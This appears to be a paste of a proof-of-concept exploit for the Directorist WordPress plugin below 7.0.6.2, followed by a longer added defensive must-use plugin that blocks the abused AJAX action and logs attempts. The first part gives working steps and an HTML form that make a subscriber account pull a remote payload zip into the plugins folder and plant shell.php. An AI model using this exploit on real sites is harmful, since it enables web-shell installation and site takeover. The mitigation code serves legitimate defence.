Directorist < 7.0.6.2 remote file upload exploit vulnerability

Posted by: a guest
Nov 17th, 2021
Language: PHP
<?php
/*
POC: Upload files to the plugins folder of any site running directorist < 7.0.6.2
Can be used to upload PHP files or replace a whole active plugin.

1. Register / Login as user (subscriber will do).
2. Paste below HTML into any page on site.
3. Replace [target-site] with the target URL.
4. Replace [site-with-payload-zip] with the URL hosting your zip file and submit the form.
5. Zip file contents will be extracted in plugins folder https://[target-site].com/wp-content/plugins/shell.php
*/
?>
<form action="https://[target-site].com/wp-admin/admin-ajax.php" method="post">
  <input type="text" name="action" value="atbdp_download_file"><br>
  <input type="text" name="download_item[download_link]" value='https://[site-with-payload-zip].com/payload.zip'><br>
  <input type="text" name="download_item[skip_licencing]" value='true'><br>
  <input type="text" name="download_item[permalink]" value='true'><br>
  <input type="text" name="type" value="plugin"><br>
  <input type="submit" value="Submit">
</form>
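The paste shows that the `atbdp_download_file` admin-ajax action fetches and extracts a remote archive on behalf of any logged-in user, so the missing control is a capability check in front of that action. The following must-use plugin is an added example of a defensive counterpart, not code from the paste or from the Directorist project: it registers on the `wp_ajax_atbdp_download_file` hook (WordPress derives that hook name from the `action` value sent in the form) at priority 0, before the plugin's own handler, and aborts the request for any user who lacks the `install_plugins` capability. The choice of `install_plugins` as the required capability, the log format, and the file name are assumptions; the real fix is upgrading to Directorist 7.0.6.2 or later, and this guard only covers the gap until then.

```php
<?php
/*
 * Plugin Name: Directorist AJAX download guard (added example mitigation)
 * Description: Not Directorist's own code. Refuses the atbdp_download_file
 *              admin-ajax action for users who cannot install plugins, until
 *              the site runs Directorist >= 7.0.6.2.
 *
 * Place this file in wp-content/mu-plugins/ (assumed path) so it is loaded
 * before regular plugins and cannot be deactivated from the dashboard.
 */

if ( ! defined( 'ABSPATH' ) ) {
    exit; // never run outside WordPress
}

/**
 * Pure policy decision, kept separate so it can be unit-tested:
 * only a user who may install plugins is allowed to trigger a remote
 * archive download/extract into wp-content/plugins.
 *
 * @param bool $can_install Result of current_user_can( 'install_plugins' ).
 * @return bool
 */
function guard_atbdp_download_is_allowed( $can_install ) {
    return true === $can_install;
}

/**
 * Early handler on the AJAX hook. Runs before the plugin's own callback
 * (priority 0 versus the default 10) and terminates the request on denial.
 */
function guard_atbdp_download_file() {
    if ( guard_atbdp_download_is_allowed( current_user_can( 'install_plugins' ) ) ) {
        return; // fall through to the plugin's own handler
    }

    // Capture the fields the PoC sends, sanitised, purely for the log line.
    $type = isset( $_POST['type'] ) ? sanitize_text_field( wp_unslash( $_POST['type'] ) ) : '';
    $link = '';
    if ( isset( $_POST['download_item']['download_link'] ) ) {
        $link = esc_url_raw( wp_unslash( $_POST['download_item']['download_link'] ) );
    }
    $ip = isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : 'unknown';

    // Surface the blocked attempt in the PHP error log so it can be alerted on.
    error_log( sprintf(
        'atbdp_download_file denied: user_id=%d type=%s link=%s ip=%s',
        get_current_user_id(),
        $type,
        $link,
        $ip
    ) );

    // wp_send_json_error() ends the request via wp_die(), so nothing later
    // on this hook (including the plugin's handler) executes.
    wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
}

// Authenticated hook, which the PoC relies on (a subscriber login suffices).
add_action( 'wp_ajax_atbdp_download_file', 'guard_atbdp_download_file', 0 );
// The paste does not say whether an unauthenticated (nopriv) variant exists;
// registering the guard there too is harmless if the plugin never hooks it.
add_action( 'wp_ajax_nopriv_atbdp_download_file', 'guard_atbdp_download_file', 0 );
```

The denial is logged before the response is sent, so a single grep for `atbdp_download_file denied` in the PHP error log gives a list of attempts with the user id and the remote URL that was requested; web-server access logs alone would not show this, because the distinguishing fields travel in the POST body rather than the query string.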